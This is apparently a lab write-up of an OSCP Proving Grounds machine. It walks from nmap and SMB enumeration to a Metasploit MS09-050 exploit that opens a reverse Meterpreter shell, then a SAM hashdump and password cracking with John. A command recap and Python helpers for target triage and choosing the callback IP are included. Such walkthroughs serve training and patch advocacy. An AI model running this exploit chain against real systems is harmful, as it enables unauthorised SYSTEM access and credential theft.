Internal – OSCP Proving Grounds
ToxSec | Windows-based Proving Grounds machine using MS09-050 for remote code execution.
0x00 Exploiting Legacy SMB: MS09-050
Forgotten Windows Server 2008 R2 hosts remain a goldmine for attackers. This walkthrough shows how a single unpatched SMBv2 flaw—MS09-050, a remote-code-execution vulnerability first patched in 2009—can still deliver full SYSTEM access today.
Internal is a reminder that patch hygiene still decides who wins.
The target is a Windows Server 2008 R2 host running exposed SMB services and carrying a decade-old remote-code-execution flaw that remains exploitable in 2025.
No lateral pivots or obscure race conditions; just disciplined reconnaissance, quick vulnerability confirmation, and a clean exploit path.
Sidebar: MS09-050 is a buffer overflow in SMBv2 negotiation. Patched in 2009, it once caused global outages. Training platforms preserve such flaws to teach fundamentals.
0x01 Initial Enumeration
Wide Nmap Scan
Always start with full coverage to avoid blind spots:
nmap -sC -sV --open <target_IP>
Results:
53/tcp open domain Microsoft DNS
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 SP1
3389/tcp open ms-wbt-server Microsoft Terminal Services
5357/tcp open httpapi Microsoft HTTPAPI httpd 2.0
49152-49158/tcp open msrpc
The standout is 139/445 (SMB) on an unpatched Server 2008 host. Classic exploit territory.
SMB Recon
Quick share checks:
smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>
No anonymous shares appeared, but that doesn’t mean SMB is safe.
Vulnerability Probe
nmap --script smb-vuln* -p 445 <target_IP>
Finding:
VULNERABLE:
MS09-050: SMBv2 Remote Code Execution
State: VULNERABLE
This confirms CVE-2009-3103 on the target.
Sidebar: Why SMB Stays High-Value:
• Requires little or no authentication to weaponize.
• Frequently exposed to the internet.
• Historic attack vector for Conficker (MS08-067), EternalBlue/WannaCry (MS17-010), and more.
Enumeration priority: always give SMB the first pass when you see it.
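The enumeration pass above boils down to one triage rule: SMB on an end-of-life Windows build goes to the top of the list. Below is an added example (not code from the original walkthrough) that parses the plain `port/proto state service version` lines nmap prints and ranks them by that rule. The risk scores and the end-of-life marker list are assumptions chosen for this illustration; the input is the scan output quoted above, pasted as a constructed sample.

```python
"""Triage an nmap service listing: flag SMB exposure and end-of-life Windows."""
import re
from dataclasses import dataclass

# Constructed sample: the nmap lines quoted in the walkthrough.
NMAP_OUTPUT = """\
53/tcp open domain Microsoft DNS
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 SP1
3389/tcp open ms-wbt-server Microsoft Terminal Services
5357/tcp open httpapi Microsoft HTTPAPI httpd 2.0
49152-49158/tcp open msrpc
"""

# Banners that identify Windows builds past end of extended support
# (Server 2008 R2 left extended support on 14 January 2020).
EOL_MARKERS = ("Windows Server 2003", "Windows Server 2008", "Windows XP", "Windows 7")

# Assumed scoring: service name -> (weight, reason). SMB outranks the rest
# because the whole attack path in the write-up hangs on it.
SERVICE_RISK = {
    "microsoft-ds": (3, "SMB exposed"),
    "netbios-ssn": (2, "NetBIOS session service (SMB over NetBIOS)"),
    "ms-wbt-server": (2, "RDP exposed"),
    "msrpc": (1, "MSRPC endpoint"),
}

# port or port range, protocol, state, service, optional version banner
LINE_RE = re.compile(r"^(\d+)(?:-(\d+))?/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


@dataclass
class Finding:
    port: str
    service: str
    version: str
    score: int
    reasons: list


def parse_nmap(text: str) -> list:
    """Turn open-port lines into Finding objects with a risk score attached."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group(4) != "open":
            continue
        lo, hi, _proto, _state, service, version = m.groups()
        port = f"{lo}-{hi}" if hi else lo
        score, reasons = 0, []
        if service in SERVICE_RISK:
            weight, why = SERVICE_RISK[service]
            score += weight
            reasons.append(why)
        if any(marker in version for marker in EOL_MARKERS):
            score += 3
            reasons.append("end-of-life Windows build in banner")
        findings.append(Finding(port, service, version, score, reasons))
    return findings


def prioritise(text: str) -> list:
    """Highest risk first; ties broken by port number."""
    return sorted(parse_nmap(text), key=lambda f: (-f.score, int(f.port.split("-")[0])))


if __name__ == "__main__":
    for f in prioritise(NMAP_OUTPUT):
        print(f"{f.port:>12}/{f.service:<14} score={f.score} {'; '.join(f.reasons) or '-'}")
```

Run against the sample, port 445 lands on top with both reasons set (SMB plus the 2008 R2 banner), which is the cue to go straight to the `smb-vuln*` scripts.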
0x02 Exploitation — MS09-050 → SYSTEM
With MS09-050 confirmed, exploitation is almost point-and-shoot.
This SMBv2 buffer overflow gives immediate unauthenticated code execution—no credentials, no privilege escalation.
Metasploit Execution
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <your_VPN_IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
run
First attempt failed; no session. Root cause: incorrect LHOST.
Reverse shells need to point back to the correct interface, which in most lab setups is the VPN tunnel.
ip a | grep tun0
After updating LHOST to the tun0 address:
[*] Started reverse TCP handler on <tun0_IP>:9999
[*] Meterpreter session 1 opened
Privilege check:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Full SYSTEM rights on first connection.
Sidebar: LHOST Discipline
• Local IP (192.168.x.x) works only for LAN targets.
• VPN IP (tun0/tun1) is required for lab/VPN targets.
• Public IP is needed for direct internet attacks.
Wrong setting = endless “no session” troubleshooting. Always verify the interface before firing a payload.
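The sidebar's rule can be checked mechanically before the handler starts. The following is an added example, not part of the original write-up: it parses the one-line output of `ip -o -4 addr show`, prefers the interface whose subnet contains the target (a LAN target), and otherwise falls back to the VPN tunnel (tun0, then tun1). The interface listing and addresses are constructed for the example.

```python
"""Pick LHOST from the interface that actually routes back from the target."""
import ipaddress
import re
import subprocess

# Constructed sample of `ip -o -4 addr show` on a lab box with LAN + VPN.
SAMPLE_IP_ADDR = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: eth0    inet 10.0.2.15/24 brd 10.0.2.255 scope global eth0\\       valid_lft forever preferred_lft forever
4: tun0    inet 192.168.45.200/24 scope global tun0\\       valid_lft forever preferred_lft forever
"""

# "<index>: <iface>    inet <addr>/<prefix> ..."
ADDR_RE = re.compile(r"^\d+:\s+(\S+)\s+inet\s+(\S+/\d+)")


def parse_interfaces(text):
    """Map interface name -> IPv4Interface from `ip -o -4 addr` lines."""
    ifaces = {}
    for line in text.splitlines():
        m = ADDR_RE.match(line.strip())
        if m:
            ifaces[m.group(1)] = ipaddress.ip_interface(m.group(2))
    return ifaces


def choose_lhost(target, text=None):
    """Return (interface, address) to set as LHOST for the given target."""
    if text is None:  # live query when no sample text is supplied
        text = subprocess.run(["ip", "-o", "-4", "addr", "show"],
                              capture_output=True, text=True, check=True).stdout
    target_ip = ipaddress.ip_address(target)
    ifaces = parse_interfaces(text)
    # 1. Same subnet as the target: a LAN target reached directly.
    for name, iface in ifaces.items():
        if not iface.ip.is_loopback and target_ip in iface.network:
            return name, str(iface.ip)
    # 2. Otherwise the lab/VPN tunnel, which is where the reverse shell must land.
    for name in ("tun0", "tun1"):
        if name in ifaces:
            return name, str(ifaces[name].ip)
    raise LookupError(f"no interface routes to {target} and no tun0/tun1 is up")


if __name__ == "__main__":
    print(choose_lhost("192.168.120.7", SAMPLE_IP_ADDR))  # tun0 for a VPN target
    print(choose_lhost("10.0.2.40", SAMPLE_IP_ADDR))      # eth0 for a LAN target
```

The LookupError is the useful failure: if the tunnel is down, the script says so before you spend an hour staring at "no session".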
0x03 Post-Exploitation — Hashdump & Cracking
A SYSTEM shell is powerful, but stopping there leaves intelligence untapped.
In real operations, persistence and lateral movement require credentials.
Dump the SAM
meterpreter > hashdump
Sample output:
aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966
Crack with John
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Recovered credentials:
aaron : blue
jack : aaa
niky : niky
Weak, but valid.
Sidebar: Go Beyond the Shell
SYSTEM access proves the exploit.
Cracked credentials prove the business risk, which is exactly what stakeholders care about.
0x04 Debrief
Internal illustrates a recurring truth: legacy systems create long-term risk even when the vulnerability is more than a decade old.
The attack path stayed clean and predictable:
• Recon exposed SMB on a Windows Server 2008 R2 target.
• Nmap vuln scripts confirmed MS09-050.
• Metasploit delivered a Meterpreter shell with full SYSTEM privileges.
• Post-exploitation recovered user hashes and cracked valid credentials.
Key takeaways
• Old CVEs linger. Business-critical servers are often excluded from patch cycles or forgotten in dark corners of an enterprise network.
• Correct setup matters. Proper LHOST/interface selection is the difference between a one-minute exploit and hours of failed sessions.
• Post-exploitation adds value. Showing cracked credentials moves the finding from “lab exercise” to “real network compromise.”
Sidebar: Confidence Builders
These “fundamentals” boxes sharpen reflexes. Fast SMB recognition, quick vuln confirmation, and disciplined post-ex steps translate directly to real-world pentests and bug bounty targets. Legacy servers are still exposed in production—practice on them and you’ll recognize the same patterns when the stakes are higher.
0x05 Command Recap
For quick reference, the exact workflow:
# Recon
nmap -sC -sV --open <target_IP>
smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>
nmap --script smb-vuln* -p 445 <target_IP>
# Exploitation (MS09-050)
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <tun0_IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
run
# Proof of Compromise
meterpreter > getuid
meterpreter > search -f proof.txt
meterpreter > cat C:\Users\Administrator\Desktop\proof.txt
# Post-Exploitation
meterpreter > hashdump
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt